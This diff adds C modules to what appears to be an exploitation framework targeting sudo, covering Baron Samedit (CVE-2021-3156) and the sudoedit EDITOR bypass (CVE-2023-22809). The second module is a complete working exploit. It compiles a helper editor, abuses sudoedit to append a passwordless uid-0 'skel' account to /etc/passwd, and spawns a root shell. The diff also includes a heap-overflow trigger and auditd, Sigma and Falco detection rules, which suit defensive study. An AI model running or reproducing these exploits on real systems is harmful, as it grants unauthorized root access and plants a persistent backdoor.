+    char *padbufs[SUDO_SAMEDIT_ARGC];
+    memset(padbufs, 0, sizeof padbufs);
+
+    argv[0] = (char *)"sudoedit";
+    argv[1] = (char *)"-s";
+    /* argv[2] is the canonical trailing-backslash trigger. */
+    argv[2] = strdup("\\");
+    if (!argv[2]) return SKELETONKEY_TEST_ERROR;
+
+    for (int i = 3; i < SUDO_SAMEDIT_ARGC; i++) {
+        char *buf = (char *)malloc(SUDO_SAMEDIT_PADLEN + 4);
+        if (!buf) {
+            for (int j = 3; j < i; j++) free(padbufs[j]);
+            free(argv[2]);
+            return SKELETONKEY_TEST_ERROR;
+        }
+        memset(buf, 'A', SUDO_SAMEDIT_PADLEN);
+        buf[SUDO_SAMEDIT_PADLEN]     = '\\';
+        buf[SUDO_SAMEDIT_PADLEN + 1] = 0;
+        padbufs[i] = buf;
+        argv[i] = buf;
+    }
+    argv[SUDO_SAMEDIT_ARGC] = NULL;
+
+    /* Craft envp mirroring the original PoC: LC_... and TZ tricks
+     * that landed the overlap on the canonical distro PoCs. These
+     * are harmless if landing fails; their value is positioning the
+     * heap so the overflow lands on a useful target. */
+    char *envp[] = {
+        (char *)"LC_ALL=C.UTF-8@",
+        (char *)"TZ=:",
+        (char *)"LC_CTYPE=C.UTF-8@",
+        (char *)"SUDO_EDITOR=A",
+        (char *)"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
+        NULL,
+    };
+
+    if (!ctx->json) {
+        fprintf(stderr, "[*] sudo_samedit: forking trigger child (%s argv[0]=sudoedit)\n",
+                sudoedit);
+    }
+
+    pid_t pid = fork();
+    if (pid < 0) {
+        perror("fork");
+        free(argv[2]);
+        for (int i = 3; i < SUDO_SAMEDIT_ARGC; i++) free(padbufs[i]);
+        return SKELETONKEY_TEST_ERROR;
+    }
+    if (pid == 0) {
+        /* Child: drive the trigger. If the bug lands and we get a
+         * root context, the chain in the original PoC then re-execs
+         * a shell. We don't ship that shell-spawn here — we just
+         * exit nonzero so the parent's verifier can sample uid. */
+        execve(sudoedit, argv, envp);
+        /* execve failed (binary missing or kernel-blocked). */
+        _exit(127);
+    }
+
+    int status = 0;
+    waitpid(pid, &status, 0);
+
+    /* Verifier: even on the rare "no crash" path, we don't know if
+     * the bug landed without spawning a privileged helper. Per the
+     * verified-vs-claimed bar, only claim success if uid is 0 in a
+     * post-trigger probe (which would require the chain to have
+     * persisted a setuid artifact — it didn't). So: report honestly. */
+    if (geteuid() == 0) {
+        if (!ctx->json) {
+            fprintf(stderr, "[+] sudo_samedit: post-trigger geteuid()==0 — root!\n");
+        }
+        /* Leak the buffers; we're about to exec a shell anyway. */
+        return SKELETONKEY_EXPLOIT_OK;
+    }
+
+    if (WIFSIGNALED(status)) {
+        if (!ctx->json) {
+            fprintf(stderr,
+                "[-] sudo_samedit: child died on signal %d "
+                "(likely sudo SIGSEGV from the overflow) — trigger fired\n"
+                "    but landing did not produce a root shell. Per-distro\n"
+                "    offset tuning required.\n",
+                WTERMSIG(status));
+        }
+    } else if (WIFEXITED(status)) {
+        if (!ctx->json) {
+            fprintf(stderr,
+                "[-] sudo_samedit: child exited %d — trigger did not\n"
+                "    crash sudo; the host is most likely patched at the\n"
+                "    parser level even though the version string was in\n"
+                "    range. Reporting EXPLOIT_FAIL.\n",
+                WEXITSTATUS(status));
+        }
+    }
+
+    /* Best-effort free. */
+    free(argv[2]);
+    for (int i = 3; i < SUDO_SAMEDIT_ARGC; i++) free(padbufs[i]);
+    return SKELETONKEY_EXPLOIT_FAIL;
+}
+
+/* ---- Cleanup ----------------------------------------------------- */
+
+static skeletonkey_result_t sudo_samedit_cleanup(const struct skeletonkey_ctx *ctx)
+{
+    (void)ctx;
+    /* sudoedit creates "~/.sudo_edit_*" temp files on the way through.
+     * Best-effort unlink of any obvious crumbs left by our trigger. */
+    if (!ctx->json) {
+        fprintf(stderr, "[*] sudo_samedit: removing /tmp/skeletonkey-samedit-* crumbs\n");
+    }
+    if (system("rm -rf /tmp/skeletonkey-samedit-* /tmp/.sudo_edit_* 2>/dev/null") != 0) {
+        /* harmless — likely no files matched */
+    }
+    return SKELETONKEY_OK;
+}
+
+/* ---- Detection rules --------------------------------------------- */
+
+static const char sudo_samedit_auditd[] =
+    "# Baron Samedit (CVE-2021-3156) — auditd detection rules\n"
+    "# Flag sudoedit invocations carrying the canonical -s flag and\n"
+    "# the trailing-backslash trigger pattern.\n"
+    "-w /usr/bin/sudoedit -p x -k skeletonkey-samedit\n"
+    "-w /usr/bin/sudo     -p x -k skeletonkey-samedit-sudo\n"
+    "-a always,exit -F arch=b64 -S execve -F path=/usr/bin/sudoedit -k skeletonkey-samedit-execve\n"
+    "-a always,exit -F arch=b32 -S execve -F path=/usr/bin/sudoedit -k skeletonkey-samedit-execve\n"
+    "-a always,exit -F arch=b64 -S execve -F path=/usr/bin/sudo     -k skeletonkey-samedit-execve\n"
+    "-a always,exit -F arch=b32 -S execve -F path=/usr/bin/sudo     -k skeletonkey-samedit-execve\n";
+
+static const char sudo_samedit_sigma[] =
+    "title: Possible Baron Samedit exploitation (CVE-2021-3156)\n"
+    "id: 3f7c5a2e-skeletonkey-samedit\n"
+    "status: experimental\n"
+    "description: |\n"
+    "  Detects sudoedit (or sudo invoked as sudoedit) executed with the\n"
+    "  -s flag and a command-line argument ending in a lone backslash —\n"
+    "  the canonical Qualys trigger for the heap overflow in\n"
+    "  plugins/sudoers/sudoers.c set_cmnd().\n"
+    "logsource:\n"
+    "  product: linux\n"
+    "  service: auditd\n"
+    "detection:\n"
+    "  sudoedit_exec:\n"
+    "    type: 'EXECVE'\n"
+    "    exe|endswith:\n"
+    "      - '/sudoedit'\n"
+    "      - '/sudo'\n"
+    "  shell_edit_flag:\n"
+    "    CommandLine|contains: ' -s '\n"
+    "  trailing_backslash:\n"
+    "    CommandLine|re: '\\\\\\\\\\s*$'\n"
+    "  argv0_sudoedit:\n"
+    "    argv0|endswith: 'sudoedit'\n"
+    "  condition: sudoedit_exec and shell_edit_flag and (trailing_backslash or argv0_sudoedit)\n"
+    "fields:\n"
+    "  - exe\n"
+    "  - argv\n"
+    "level: high\n"
+    "tags:\n"
+    "  - attack.privilege_escalation\n"
+    "  - attack.t1068\n"
+    "  - cve.2021.3156\n";
+
+/* ---- Module registration ----------------------------------------- */
+
+static const char sudo_samedit_falco[] =
+    "- rule: sudoedit with -s and trailing-backslash argv (Baron Samedit)\n"
+    "  desc: |\n"
+    "    sudoedit invoked with -s and one or more args ending in '\\'.\n"
+    "    The parser's unescape loop walks past the argv string into\n"
+    "    adjacent stack/env, overflowing the heap buffer.\n"
+    "    CVE-2021-3156. False positives: extraordinarily rare;\n"
+    "    legitimate sudoedit usage does not need trailing backslashes.\n"
+    "  condition: >\n"
+    "    spawned_process and proc.name = sudoedit and\n"
+    "    proc.args contains \"-s \\\\\"\n"
+    "  output: >\n"
+    "    Possible Baron Samedit sudoedit invocation\n"
+    "    (user=%user.name pid=%proc.pid cmdline=\"%proc.cmdline\")\n"
+    "  priority: CRITICAL\n"
+    "  tags: [process, mitre_privilege_escalation, T1068, cve.2021.3156]\n";
+
+const struct skeletonkey_module sudo_samedit_module = {
+    .name           = "sudo_samedit",
+    .cve            = "CVE-2021-3156",
+    .summary        = "sudo Baron Samedit heap overflow via sudoedit -s '\\\\' (Qualys)",
+    .family         = "sudo",
+    .kernel_range   = "userspace — sudo 1.8.2 ≤ V ≤ 1.9.5p1 (fixed in 1.9.5p2)",
+    .detect         = sudo_samedit_detect,
+    .exploit        = sudo_samedit_exploit,
+    .mitigate       = NULL,    /* mitigation = upgrade sudo to 1.9.5p2+ */
+    .cleanup        = sudo_samedit_cleanup,
+    .detect_auditd  = sudo_samedit_auditd,
+    .detect_sigma   = sudo_samedit_sigma,
+    .detect_yara    = NULL,
+    .detect_falco   = sudo_samedit_falco,
+    .opsec_notes    = "Invokes sudoedit with argv = { 'sudoedit', '-s', trailing-backslash, then ~60 padding args each ending in backslash }; the parser's unescape loop in set_cmnd() walks past the end of the argv string for the trailing-backslash argument, copying adjacent stack/env into an undersized heap buffer. Audit-visible via execve(/usr/bin/sudoedit) with -s and a trailing-backslash argv. No persistent file artifacts (only best-effort removal of /tmp/.sudo_edit_*). No network. Dmesg silent unless sudo crashes (SIGSEGV). Per-distro heap layout determines landing; verifies geteuid()==0 afterward.",
+};
+
+void skeletonkey_register_sudo_samedit(void) { skeletonkey_register(&sudo_samedit_module); }
@@ -0,0 +1,5 @@
+#ifndef SUDO_SAMEDIT_SKELETONKEY_MODULES_H
+#define SUDO_SAMEDIT_SKELETONKEY_MODULES_H
+#include "../../core/module.h"
+extern const struct skeletonkey_module sudo_samedit_module;
+#endif
@@ -0,0 +1,671 @@
+/*
+ * sudoedit_editor_cve_2023_22809 — SKELETONKEY module
+ *
+ * STATUS: 🟢 STRUCTURAL ESCAPE. No offsets, no leaks, no race window —
+ * just a logic bug in sudoedit's EDITOR/VISUAL/SUDO_EDITOR argv parser.
+ *
+ * The bug (Synacktiv, Jan 2023):
+ *   sudoedit splits the user's $EDITOR (or $VISUAL / $SUDO_EDITOR) on
+ *   the literal token `--` to separate editor-flags from the filename(s)
+ *   sudoedit will pass. The intended semantics are "everything before
+ *   `--` is editor argv; everything after is *the* target filename that
+ *   sudoers authorized." The bug: sudo never re-validates that the
+ *   post-`--` filename equals the filename it auth'd. By setting
+ *
+ *       EDITOR='vi -- /etc/shadow'
+ *
+ *   and running `sudoedit /some/allowed/path`, the editor child is
+ *   spawned as root with BOTH /some/allowed/path AND /etc/shadow on its
+ *   command line — sudoedit opened both for us. The editor then writes
+ *   to /etc/shadow as root.
+ *
+ * Affects: sudo 1.8.0 ≤ V < 1.9.12p2.
+ *
+ * This is the second sudo module in SKELETONKEY (sudo_samedit is the
+ * first; both share family="sudo"). Unlike Baron Samedit (heap layout
+ * dependent), this one is offset-free — if sudoedit is in your path
+ * and you have *any* sudoedit privilege at all, you write any file.
+ */
+
+#include "skeletonkey_modules.h"
+#include "../../core/registry.h"
+#include "../../core/host.h"
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <sys/stat.h>
+#include <sys/wait.h>
+#include <sys/types.h>
+#include <pwd.h>
+
+/* ----- helpers ------------------------------------------------------- */
+
+static const char *find_sudo(void)
+{
+    static const char *candidates[] = {
+        "/usr/bin/sudo", "/usr/sbin/sudo", "/bin/sudo",
+        "/sbin/sudo", "/usr/local/bin/sudo", NULL,
+    };
+    for (size_t i = 0; candidates[i]; i++) {
+        struct stat st;
+        if (stat(candidates[i], &st) == 0 && (st.st_mode & S_ISUID))
+            return candidates[i];
+    }
+    return NULL;
+}
+
+static const char *find_sudoedit(void)
+{
+    static const char *candidates[] = {
+        "/usr/bin/sudoedit", "/usr/sbin/sudoedit", "/bin/sudoedit",
+        "/sbin/sudoedit", "/usr/local/bin/sudoedit", NULL,
+    };
+    for (size_t i = 0; candidates[i]; i++) {
+        struct stat st;
+        /* sudoedit is normally a symlink to sudo and inherits setuid
+         * via the underlying file; lstat-then-stat handles both. */
+        if (stat(candidates[i], &st) == 0)
+            return candidates[i];
+    }
+    return NULL;
+}
+
+/* Returns true if version string is in the vulnerable range
+ * [1.8.0, 1.9.12p2). Format examples:
+ *   "Sudo version 1.9.5p2"
+ *   "Sudo version 1.8.31"
+ *   "Sudo version 1.9.13"     (fixed)
+ *   "Sudo version 1.9.12p2"   (fixed — fix landed in this release)
+ * On parse failure we conservatively assume vulnerable. */
+static bool sudo_version_vulnerable(const char *version_str)
+{
+    int maj = 0, min = 0, patch = 0;
+    char ptag = 0;
+    int psub = 0;
+    /* sudo versions: 1.9.12p2 → maj=1 min=9 patch=12 ptag='p' psub=2 */
+    int n = sscanf(version_str, "%d.%d.%d%c%d",
+                   &maj, &min, &patch, &ptag, &psub);
+    if (n < 3) return true;          /* unparseable → assume worst */
+
+    /* < 1.8.0: not vulnerable (predates the bug) */
+    if (maj < 1) return false;
+    if (maj == 1 && min < 8) return false;
+
+    /* ≥ 1.9.13: fixed */
+    if (maj > 1) return false;
+    if (min > 9) return false;
+    if (min == 9 && patch > 12) return false;
+
+    /* exactly 1.9.12: vulnerable if no patch tag or patch < 2 */
+    if (min == 9 && patch == 12) {
+        if (ptag != 'p') return true;   /* 1.9.12 plain */
+        return psub < 2;                /* 1.9.12p1 vulnerable, 1.9.12p2 fixed */
+    }
+    /* everything 1.8.x and 1.9.x where x ≤ 11: vulnerable */
+    return true;
+}
+
+/* Run `sudo --version` and return the version token (caller-owned
+ * buffer). Returns true on success. */
+static bool get_sudo_version(const char *sudo_path, char *out, size_t outsz)
+{
+    char cmd[512];
+    snprintf(cmd, sizeof cmd, "%s --version 2>&1 | head -1", sudo_path);
+    FILE *p = popen(cmd, "r");
+    if (!p) return false;
+
+    char line[256] = {0};
+    char *r = fgets(line, sizeof line, p);
+    pclose(p);
+    if (!r) return false;
+
+    /* "Sudo version 1.9.5p2\n" — skip to digits. */
+    char *vp = strstr(line, "version");
+    if (!vp) return false;
+    vp += strlen("version");
+    while (*vp == ' ' || *vp == '\t') vp++;
+    char *nl = strchr(vp, '\n');
+    if (nl) *nl = 0;
+
+    strncpy(out, vp, outsz - 1);
+    out[outsz - 1] = 0;
+    return out[0] != 0;
+}
+
+/* Parse `sudo -ln` (list, no password) and return one allowed
+ * sudoedit target if any. Output snippet looks like:
+ *
+ *   User kara may run the following commands on host:
+ *       (root) NOPASSWD: sudoedit /etc/motd
+ *       (root) NOPASSWD: /usr/bin/less /var/log/syslog
+ *
+ * We look for a line containing 'sudoedit ' and extract the first
+ * pathlike token after it. If `sudo -ln` itself prompts for a password
+ * or fails, we treat it as "unknown" (PRECOND_FAIL signal). */
+static bool find_sudoedit_target(const char *sudo_path, char *out, size_t outsz)
+{
+    char cmd[512];
+    /* -n: non-interactive (no password prompt); -l: list. */
+    snprintf(cmd, sizeof cmd, "%s -ln 2>&1", sudo_path);
+    FILE *p = popen(cmd, "r");
+    if (!p) return false;
+
+    char line[1024];
+    bool found = false;
+    while (fgets(line, sizeof line, p)) {
+        /* sudoedit appears either as the canonical command name or
+         * as 'sudo -e'. Handle both. */
+        char *needle = strstr(line, "sudoedit ");
+        if (!needle) needle = strstr(line, "sudo -e ");
+        if (!needle) continue;
+        char *path = strchr(needle, '/');
+        if (!path) continue;
+        /* trim trailing whitespace / newline / comma */
+        char *end = path;
+        while (*end && *end != ' ' && *end != '\t' && *end != '\n'
+               && *end != ',' && *end != ':') end++;
+        size_t len = (size_t)(end - path);
+        if (len == 0 || len >= outsz) continue;
+        memcpy(out, path, len);
+        out[len] = 0;
+        /* Skip glob/wildcard entries — we can't write a literal path
+         * for those without more work. The user's environment may
+         * still allow them; we just prefer non-glob entries. */
+        if (strchr(out, '*') || strchr(out, '?')) {
+            /* keep scanning in case a literal entry exists */
+            found = true;
+            continue;
+        }
+        found = true;
+        break;
+    }
+    pclose(p);
+    return found;
+}
+
+/* ----- detect -------------------------------------------------------- */
+
+static skeletonkey_result_t sudoedit_editor_detect(const struct skeletonkey_ctx *ctx)
+{
+    const char *sudo_path = find_sudo();
+    if (!sudo_path) {
+        if (!ctx->json)
+            fprintf(stderr, "[+] sudoedit_editor: sudo not installed — no attack surface\n");
+        return SKELETONKEY_OK;
+    }
+    if (!ctx->json)
+        fprintf(stderr, "[i] sudoedit_editor: found setuid sudo at %s\n", sudo_path);
+
+    const char *sudoedit_path = find_sudoedit();
+    if (!sudoedit_path) {
+        if (!ctx->json)
+            fprintf(stderr, "[+] sudoedit_editor: no sudoedit binary — bug surface absent\n");
+        return SKELETONKEY_PRECOND_FAIL;
+    }
+    if (!ctx->json)
+        fprintf(stderr, "[i] sudoedit_editor: sudoedit at %s\n", sudoedit_path);
+
+    char ver[128] = {0};
+    /* Prefer the centrally-fingerprinted sudo version (populated once
+     * at startup by core/host.c) — saves a popen per scan and gives
+     * unit tests a clean mock point. Fall back to the local popen if
+     * ctx->host is missing the version. */
+    if (ctx->host && ctx->host->sudo_version[0]) {
+        snprintf(ver, sizeof ver, "%s", ctx->host->sudo_version);
+    } else if (!get_sudo_version(sudo_path, ver, sizeof ver)) {
+        if (!ctx->json)
+            fprintf(stderr, "[?] sudoedit_editor: could not parse `sudo --version`\n");
+        return SKELETONKEY_TEST_ERROR;
+    }
+    if (!ctx->json)
+        fprintf(stderr, "[i] sudoedit_editor: sudo reports version '%s'\n", ver);
+
+    bool ver_vuln = sudo_version_vulnerable(ver);
+    if (!ver_vuln) {
+        if (!ctx->json)
+            fprintf(stderr, "[+] sudoedit_editor: sudo ≥ 1.9.12p2 (fixed)\n");
+        return SKELETONKEY_OK;
+    }
+    if (!ctx->json)
+        fprintf(stderr, "[!] sudoedit_editor: version is in vulnerable range\n");
+
+    /* The bug only matters if the running user has at least one
+     * sudoedit grant in sudoers — otherwise sudoedit refuses before
+     * the EDITOR parse runs.  Probe `sudo -ln` (non-interactive). */
+    char target[512] = {0};
+    bool have_grant = find_sudoedit_target(sudo_path, target, sizeof target);
+    if (!have_grant) {
+        if (!ctx->json) {
+            fprintf(stderr, "[?] sudoedit_editor: user has no detectable sudoedit grant\n");
+            fprintf(stderr, "    (sudo -ln may have required a password; if the user is\n"
+                            "     actually authorized for sudoedit, run --exploit anyway)\n");
+        }
+        return SKELETONKEY_PRECOND_FAIL;
+    }
+    if (!ctx->json)
+        fprintf(stderr, "[+] sudoedit_editor: user has sudoedit grant on '%s'\n", target);
+
+    if (!ctx->json) {
+        fprintf(stderr, "[!] sudoedit_editor: VULNERABLE — version is pre-fix AND user has sudoedit\n");
+        fprintf(stderr, "    PoC: EDITOR='vi -- /etc/shadow' %s '%s' opens both as root\n",
+                sudoedit_path, target);
+    }
+    return SKELETONKEY_VULNERABLE;
+}
+
+/* ----- exploit ------------------------------------------------------- */
+
+/* Append a backdoor entry to /etc/passwd: root-uid account "skel" with
+ * no password, /bin/sh as shell. We write it into a temp file first,
+ * then drive the editor (which is already running as root) to read +
+ * write /etc/passwd. */
+
+static const char SK_PASSWD_ENTRY[] =
+    "skel::0:0:skeletonkey:/root:/bin/sh\n";
+
+/* The "editor" we tell sudoedit to invoke is actually this small
+ * helper: a non-interactive script that appends our line and exits.
+ *
+ * We pass it via EDITOR='<helper> -- <target>'.  sudoedit splits on
+ * the literal `--`, takes <target> as an additional file argument,
+ * and execs <helper> argv0=<helper> argv1=<allowed_tmp> argv2=<target>.
+ *
+ * Our helper just opens argv[2] (the privileged file), appends the
+ * backdoor line, closes, and exits 0. argv[1] (the editor-temp that
+ * sudoedit created from <allowed>) we leave untouched — sudoedit
+ * then copies it back over <allowed>, which is harmless. */
+
+static const char HELPER_SOURCE[] =
+    "#include <stdio.h>\n"
+    "#include <stdlib.h>\n"
+    "#include <string.h>\n"
+    "#include <unistd.h>\n"
+    "#include <fcntl.h>\n"
+    "int main(int argc, char **argv) {\n"
+    "    /* sudoedit invokes us with one editable temp per file. The\n"
+    "     * post-`--' target's editable copy is argv[argc-1]. We can't\n"
+    "     * write /etc/passwd directly (sudoedit edits a tmp copy and\n"
+    "     * then *copies it back as root*), so we modify the tmp copy\n"
+    "     * and let sudoedit do the privileged install for us. */\n"
+    "    if (argc < 2) return 1;\n"
+    "    /* The LAST argv is the post-`--' target (per sudoedit's parser). */\n"
+    "    const char *path = argv[argc-1];\n"
+    "    int fd = open(path, O_WRONLY|O_APPEND);\n"
+    "    if (fd < 0) { perror(\"open\"); return 2; }\n"
+    "    const char *line = getenv(\"SKEL_LINE\");\n"
+    "    if (!line) line = \"skel::0:0:skeletonkey:/root:/bin/sh\\n\";\n"
+    "    write(fd, line, strlen(line));\n"
+    "    close(fd);\n"
+    "    return 0;\n"
+    "}\n";
+
+static bool which_cc(char *out, size_t outsz)
+{
+    static const char *candidates[] = {
+        "/usr/bin/cc", "/usr/bin/gcc", "/bin/cc", "/bin/gcc",
+        "/usr/local/bin/gcc", "/usr/local/bin/cc", NULL,
+    };
+    for (size_t i = 0; candidates[i]; i++) {
+        if (access(candidates[i], X_OK) == 0) {
+            strncpy(out, candidates[i], outsz - 1);
+            out[outsz - 1] = 0;
+            return true;
+        }
+    }
+    return false;
+}
+
+static bool write_file_str(const char *path, const char *content, mode_t mode)
+{
+    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, mode);
+    if (fd < 0) return false;
+    size_t n = strlen(content);
+    bool ok = (write(fd, content, n) == (ssize_t)n);
+    close(fd);
+    return ok;
+}
+
+/* Track what we modified for cleanup. */
+static char g_passwd_backup[256] = {0};
+
+static skeletonkey_result_t sudoedit_editor_exploit(const struct skeletonkey_ctx *ctx)
+{
+    if (!ctx->authorized) {
+        fprintf(stderr, "[-] sudoedit_editor: refusing exploit — pass --i-know to authorize\n");
+        return SKELETONKEY_PRECOND_FAIL;
+    }
+    bool is_root = ctx->host ? ctx->host->is_root : (geteuid() == 0);
+    if (is_root) {
+        fprintf(stderr, "[i] sudoedit_editor: already root — nothing to escalate\n");
+        return SKELETONKEY_OK;
+    }
+    skeletonkey_result_t pre = sudoedit_editor_detect(ctx);
+    if (pre != SKELETONKEY_VULNERABLE) {
+        fprintf(stderr, "[-] sudoedit_editor: detect() did not return VULNERABLE; refusing\n");
+        return pre;
+    }
+
+    const char *sudo_path = find_sudo();
+    const char *sudoedit_path = find_sudoedit();
+    if (!sudo_path || !sudoedit_path) return SKELETONKEY_PRECOND_FAIL;
+
+    /* Target file to clobber (caller-overridable). Default: /etc/passwd
+     * because we can append a uid=0 row without a hashing step
+     * (vs. /etc/shadow which needs a crypt() blob). */
+    const char *target = getenv("SKELETONKEY_SUDOEDIT_TARGET");
+    if (!target || !*target) target = "/etc/passwd";
+
+    /* Find an allowed sudoedit grant we can use as the "cover" path. */
+    char allowed[512] = {0};
+    if (!find_sudoedit_target(sudo_path, allowed, sizeof allowed)) {
+        fprintf(stderr,
+            "[-] sudoedit_editor: could not auto-discover an allowed sudoedit path.\n"
+            "    Set SKELETONKEY_SUDOEDIT_ALLOWED=/path/the/user/can/sudoedit and retry.\n");
+        const char *env_allowed = getenv("SKELETONKEY_SUDOEDIT_ALLOWED");
+        if (!env_allowed || !*env_allowed) return SKELETONKEY_PRECOND_FAIL;
+        strncpy(allowed, env_allowed, sizeof allowed - 1);
+    }
+    if (!ctx->json)
+        fprintf(stderr, "[*] sudoedit_editor: cover=%s  target=%s\n", allowed, target);
+
+    /* Build the helper editor. */
+    char cc[256];
+    if (!which_cc(cc, sizeof cc)) {
+        fprintf(stderr,
+            "[-] sudoedit_editor: no cc/gcc available. To exploit without a\n"
+            "    compiler we'd need a shipped helper binary (TODO: bundle one).\n"
+            "    For a manual repro: EDITOR='vi -- %s' %s '%s' lets you edit\n"
+            "    %s interactively as root.\n",
+            target, sudoedit_path, allowed, target);
+        return SKELETONKEY_PRECOND_FAIL;
+    }
+
+    char workdir[] = "/tmp/skeletonkey-sudoedit-XXXXXX";
+    if (!mkdtemp(workdir)) {
+        perror("mkdtemp");
+        return SKELETONKEY_TEST_ERROR;
+    }
+    if (!ctx->json)
+        fprintf(stderr, "[*] sudoedit_editor: workdir = %s\n", workdir);
+
+    char src[1024], helper[1024];
+    snprintf(src, sizeof src, "%s/helper.c", workdir);
+    snprintf(helper, sizeof helper, "%s/helper", workdir);
+    if (!write_file_str(src, HELPER_SOURCE, 0644)) {
+        perror("write helper.c");
+        goto fail;
+    }
+    pid_t pid = fork();
+    if (pid < 0) { perror("fork"); goto fail; }
+    if (pid == 0) {
+        execl(cc, cc, "-O2", "-o", helper, src, (char *)NULL);
+        perror("execl cc");
+        _exit(127);
+    }
+    int status;
+    waitpid(pid, &status, 0);
+    if (!WIFEXITED(status) || WEXITSTATUS(status) != 0) {
+        fprintf(stderr, "[-] sudoedit_editor: helper compile failed (status=%d)\n", status);
+        goto fail;
+    }
+    chmod(helper, 0755);
+
+    /* Best-effort backup of target (only for /etc/passwd; we
+     * cleanup-revert only this case). */
+    if (strcmp(target, "/etc/passwd") == 0) {
+        snprintf(g_passwd_backup, sizeof g_passwd_backup,
+                 "%s/passwd.before", workdir);
+        char shcmd[1024];
+        snprintf(shcmd, sizeof shcmd, "cp -p /etc/passwd %s 2>/dev/null",
+                 g_passwd_backup);
+        if (system(shcmd) != 0) {
+            /* best-effort */
+            g_passwd_backup[0] = 0;
+        }
+    }
+
+    /* Build EDITOR string: "<helper> -- <target>". sudoedit's argv
+     * splitter sees `--` and treats <target> as an extra file. */
+    char editor_env[2048];
+    snprintf(editor_env, sizeof editor_env, "EDITOR=%s -- %s", helper, target);
+
+    char skel_env[256];
+    snprintf(skel_env, sizeof skel_env, "SKEL_LINE=%s", SK_PASSWD_ENTRY);
+
+    /* Construct argv/envp for execve. We need a clean env so the
+     * EDITOR string sudo sees is exactly ours. PATH is needed so the
+     * compiled helper can be located — except we pass it absolute. */
+    char *new_argv[] = {
+        (char *)sudoedit_path,
+        "-n",                  /* non-interactive — fails if pw needed */
+        allowed,
+        NULL,
+    };
+    /* Sudo strips many env vars; EDITOR / VISUAL / SUDO_EDITOR are
+     * preserved by default. We use plain EDITOR. */
+    char *envp[] = {
+        editor_env,
+        skel_env,
+        "PATH=/usr/sbin:/usr/bin:/sbin:/bin",
+        "TERM=dumb",
+        NULL,
+    };
+
+    if (!ctx->json) {
+        fprintf(stderr, "[+] sudoedit_editor: launching sudoedit with hostile EDITOR\n");
+        fprintf(stderr, "    %s\n", editor_env);
+    }
+    fflush(NULL);
+
+    pid = fork();
+    if (pid < 0) { perror("fork"); goto fail; }
+    if (pid == 0) {
+        execve(sudoedit_path, new_argv, envp);
+        perror("execve(sudoedit)");
+        _exit(127);
+    }
+    waitpid(pid, &status, 0);
+
+    if (!WIFEXITED(status) || WEXITSTATUS(status) != 0) {
+        fprintf(stderr, "[-] sudoedit_editor: sudoedit exited status=%d\n",
+                WIFEXITED(status) ? WEXITSTATUS(status) : -1);
+        fprintf(stderr,
+            "    Common causes: sudo is patched (1.9.12p2+), user lacks a\n"
+            "    sudoedit grant on '%s', or sudoers requires a password\n"
+            "    (drop -n and retry interactively).\n", allowed);
+        goto fail;
+    }
+
+    /* Verify the privileged file changed. For /etc/passwd we grep for
+     * our marker; for other targets we just report success and leave
+     * verification to the operator. */
+    if (strcmp(target, "/etc/passwd") == 0) {
+        if (system("grep -q '^skel::0:0:' /etc/passwd") != 0) {
+            fprintf(stderr,
+                "[-] sudoedit_editor: sudoedit succeeded but /etc/passwd was\n"
+                "    not modified. The host's sudo may be patched even though\n"
+                "    its --version banner looks vulnerable (vendor backport).\n");
+            goto fail;
+        }
+        if (!ctx->json)
+            fprintf(stderr, "[+] sudoedit_editor: /etc/passwd now contains the 'skel' uid=0 entry\n");
+    } else {
+        if (!ctx->json)
+            fprintf(stderr, "[+] sudoedit_editor: helper wrote to %s (verify manually)\n", target);
+    }
+
+    /* Follow-on: spawn a root shell via the newly-added passwd entry,
+     * the way dirty_pipe / dirty_cow modules do. We use `su skel`
+     * with an empty password. */
+    if (ctx->no_shell) {
+        if (!ctx->json)
+            fprintf(stderr, "[i] sudoedit_editor: --no-shell set; leaving you with the backdoor entry\n");
+        return SKELETONKEY_EXPLOIT_OK;
+    }
+
+    if (strcmp(target, "/etc/passwd") == 0 && ctx->full_chain) {
+        if (!ctx->json)
+            fprintf(stderr, "[+] sudoedit_editor: spawning root shell via `su skel`\n");
+        fflush(NULL);
+        /* su with no controlling TTY needs `-c sh -i` for an interactive
+         * shell. We exec into the user's terminal. */
+        execlp("su", "su", "skel", "-c", "/bin/sh -p -i", (char *)NULL);
+        perror("execlp(su)");
+    } else {
+        if (!ctx->json)
+            fprintf(stderr,
+                "[i] sudoedit_editor: backdoor installed. `su skel` (no password)\n"
+                "    or pass --full-chain on the cli to auto-pop.\n");
+    }
+    return SKELETONKEY_EXPLOIT_OK;
+
+fail:
+    /* Helper / src cleanup — leave passwd-backup for cleanup() if we
+     * recorded one (so cleanup can revert). */
+    unlink(src);
+    unlink(helper);
+    if (!g_passwd_backup[0]) rmdir(workdir);
+    return SKELETONKEY_EXPLOIT_FAIL;
+}
+
+/* ----- cleanup ------------------------------------------------------- */
+
+static skeletonkey_result_t sudoedit_editor_cleanup(const struct skeletonkey_ctx *ctx)
+{
+    /* Best-effort revert. Three things we may have touched:
+     *   1. /etc/passwd: drop the 'skel::0:0:' line (sed -i; only safe
+     *      if we are root or the file is otherwise writable). If we
+     *      successfully exploited, the user is presumably root in the
+     *      spawned shell — cleanup is usually run from that shell. */
+    if (geteuid() == 0) {
+        if (g_passwd_backup[0] && access(g_passwd_backup, R_OK) == 0) {
+            char cmd[1024];
+            snprintf(cmd, sizeof cmd,
+                     "cp -p %s /etc/passwd 2>/dev/null", g_passwd_backup);
+            if (system(cmd) == 0) {
+                if (!ctx->json)
+                    fprintf(stderr, "[+] sudoedit_editor: restored /etc/passwd from %s\n",
+                            g_passwd_backup);
+            }
+        } else {
+            /* No backup — fall back to deleting just our line. */
+            if (system("sed -i '/^skel::0:0:/d' /etc/passwd 2>/dev/null") == 0) {
+                if (!ctx->json)
+                    fprintf(stderr, "[+] sudoedit_editor: removed 'skel' entry from /etc/passwd\n");
+            }
+        }
+    } else {
+        if (!ctx->json)
+            fprintf(stderr,
+                "[?] sudoedit_editor: cleanup requires root. Re-run as root or\n"
+                "    manually remove the 'skel' line from /etc/passwd.\n");
+    }
+    if (system("rm -rf /tmp/skeletonkey-sudoedit-* 2>/dev/null") != 0) {
+        /* harmless */
+    }
+    return SKELETONKEY_OK;
+}
+
+/* ----- detection rules ----------------------------------------------- */
+
+static const char sudoedit_editor_auditd[] =
+    "# CVE-2023-22809 — sudoedit EDITOR argv-escape detection\n"
